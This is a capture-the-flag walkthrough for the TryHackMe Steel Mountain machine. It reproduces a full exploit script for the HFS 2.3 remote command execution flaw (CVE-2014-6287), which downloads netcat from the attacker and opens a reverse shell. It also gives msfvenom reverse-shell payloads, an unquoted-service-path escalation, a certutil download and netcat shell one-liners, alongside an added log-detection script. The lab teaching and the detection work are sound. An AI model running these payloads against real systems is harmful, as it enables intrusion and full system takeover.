THM Steel Mountain

Steel Mountain

Difficulty: Medium→High
Score: 6/10 (Metasploit) 7.5/10 (Without Metasploit)


Target

  1. Two flags
  2. SYSTEM privilege

Process

Reconnaissance

Port Service Scan

nmap -p1-10000 10.10.60.210

Ports 80, 135, 139, 445, 3389, 5985 and 8080 are open.
Let's identify the service versions on those ports.

nmap -p80,135,139,445,3389,5985,8080 -A  10.10.60.210
Output:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 09:03 EST
Nmap scan report for 10.10.60.210
Host is up (0.23s latency).
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2022-01-22T14:05:55+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2022-01-21T13:58:05
|_Not valid after:  2022-07-23T13:58:05
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2022-01-22T14:05:49+00:00
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-01-22T14:05:49
|_  start_date: 2022-01-22T13:57:59
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:0c:ff:1b:e3:f5 (unknown)
TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   225.02 ms 10.11.0.1
2   225.16 ms 10.10.60.210
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.68 seconds

Browse to http://10.10.231.27:8080


Inspecting the page elements reveals the server software:

rejetto HTTP FILE SERVER

Search for a rejetto 2.3 exploit.

The original exploit script (we will use it again in the "Without Metasploit" section):

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#         It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#         It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!
import urllib2
import sys
try:
  def script_create():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
  def execute_script():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
  def nc_run():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
  ip_addr = "192.168.44.128" #local IP address
  local_port = "443" # Local Port number
  vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
  save= "save|" + vbs
  vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
  exe= "exec|"+vbs2
  vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
  exe1= "exec|"+vbs3
  script_create()
  execute_script()
  nc_run()
except:
  print """[.]Something went wrong..!
  Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
  Don't forgot to change the Local IP address and Port number on the script"""
The vbs string from the script, URL-decoded. The part before the "|" is the path the save macro writes to; the rest is the VBScript body, with ip_addr still the Python variable spliced in:

C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://" + ip_addr + "/nc.exe", False
' nc.exe is fetched from the web server we run on ip_addr
xHttp.Send
with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite existing file
end with
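From the defender's side, the exploit above leaves a very recognisable trace: a request whose search parameter carries a NUL byte (%00) followed by an HFS macro such as {.save|...} or {.exec|...}. The following script is an added example, not part of the original write-up or of the exploit, and it runs over a few constructed access-log lines (the log format, clients and timestamps are made up for the example) to flag requests that match that CVE-2014-6287 pattern.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the page): two exploit-style
# requests using the macros the public PoC relies on, plus two benign ones.
SAMPLE_LOG = """\
10.0.0.5 - [22/Jan/2022:14:10:01 +0000] "GET /?search=%00{.save|C%3A%5CUsers%5CPublic%5Cscript.vbs|dim%20xHttp.} HTTP/1.1" 200
10.0.0.5 - [22/Jan/2022:14:10:03 +0000] "GET /?search=%00{.exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200
10.0.0.9 - [22/Jan/2022:14:11:17 +0000] "GET /?search=quarterly%20report HTTP/1.1" 200
10.0.0.9 - [22/Jan/2022:14:11:40 +0000] "GET /files/notes%20{draft}.txt HTTP/1.1" 200
"""

# Simple "client - [time] "METHOD target PROTO" status" log line.
LINE_RE = re.compile(
    r'^(?P<client>\S+) - \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# HFS macros look like {.name|args.}; these names read, write or run things
# on the server, so they have no business arriving from a client.
MACRO_RE = re.compile(r"\{\.\s*(exec|save|load|delete|append)\b", re.IGNORECASE)


def analyse_target(target: str) -> list:
    """Return the indicators found in one request target (path + query)."""
    decoded = unquote(target)          # %00 -> NUL, %7B -> {, %20 -> space ...
    indicators = []
    if "\x00" in decoded:              # the NUL that defeats HFS 2.3's filter
        indicators.append("null-byte")
    m = MACRO_RE.search(decoded)
    if m:
        indicators.append("macro:" + m.group(1).lower())
    return indicators


def scan_log(text: str) -> list:
    """Return one finding dict per request that carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        indicators = analyse_target(m.group("target"))
        if indicators:
            findings.append({
                "client": m.group("client"),
                "time": m.group("time"),
                "indicators": indicators,
                # NUL byte plus a macro together is the exact exploit pattern
                "severity": "high" if len(indicators) > 1 else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["client"], f["time"], ", ".join(f["indicators"]))
```

Decoding before matching matters: the macro braces and the NUL are percent-encoded on the wire, and an alert written against the raw request line is trivially bypassed by double encoding, whereas the decoded form is what HFS itself acts on. The benign fourth line shows why the rule keys on the "{." macro opener rather than on any brace.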

Metasploit

Search Metasploit for the exploit:

search rejetto 2.3


First, let's exploit the victim machine with Metasploit.
Select the module and show its options.

Set RHOST, SRVHOST, LHOST and LPORT (default 4444).
RHOST is the victim machine's IP and RPORT is 8080.
SRVHOST and LHOST are our local machine's IP.

Exploiting


We now have a meterpreter shell.

Find the first flag

Privilege Escalation

Upload PowerUp.ps1.

Load the PowerShell extension:

load powershell
powershell_shell

Import PowerUp.ps1 in the PowerShell session and run Invoke-AllChecks.

Invoke-AllChecks reports an unquoted service path for the service AdvancedSystemCareService9.
Use msfvenom to build a reverse-shell executable named Advanced.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.61.17 LPORT=4445  -f exe> Advanced.exe

Change to the relevant directory and upload Advanced.exe.

Check the AdvancedSystemCareService9 configuration:

sc qc AdvancedSystemCareService9


Stop the service and start it again; the new session runs with SYSTEM privileges.


We have to migrate quickly: the session dies once the service binary fails to respond to the service control manager.



Alternatively, this command migrates the session automatically:

run post/windows/manage/migrate

The best approach is to build a payload that migrates into another process on its own:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.61.17 LPORT=4446 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  Advanced.exe

The same with a plain (non-meterpreter) shell payload, caught with a netcat listener:

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.61.17 LPORT=4446  -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe> Advanced.exe

Get the system privilege

Get the flag2

Without Metasploit

Use the CVE-2014-6287 exploit script from above.


Modify ip_addr and local_port in the script.
Start the local web server that serves nc.exe and run the exploit.

Run the exploit a second time and we get the reverse shell.

Use the winPEAS.exe binary to enumerate the system:

certutil -urlcache -f http://10.11.61.17/winPEAS.exe winpeas.exe

Execute winpeas.exe in cmd

winPEAS shows the same unquoted service path.
Exploit the unquoted path (or use DLL hijacking) as before; the remaining steps are the same with either a meterpreter shell or a plain nc shell and yield the Administrator flag.

Delivery

We can use either an nc shell or a Metasploit shell, and upgrade our shell from there.

Netcat bind shell

A Bind Shell is when the listener is running on the target and you are presented with a command shell when connecting to the target. In other words the target would be waiting for us to connect to it.

Target machine:
Windows: nc.exe -nvlp <PORT> -e cmd.exe
Linux: nc -nvlp <PORT> -e /bin/sh (or /bin/bash)
Attacker:
nc -nv <Target Machine IP> <Target Machine Port>

Netcat reverse shell

With a bind shell we connect to the target, which is fine if no firewall filters inbound connections. With a reverse shell we instead set up the listener on our own system (the attacker) and have the target connect back to us and provide the command shell.

Attacker:
nc -lnvp <PORT>
Target machine:
Windows: nc.exe <Hacker IP> <Hacker Port> -e cmd.exe
Linux: nc <Hacker IP> <Hacker Port> -e /bin/sh

Summary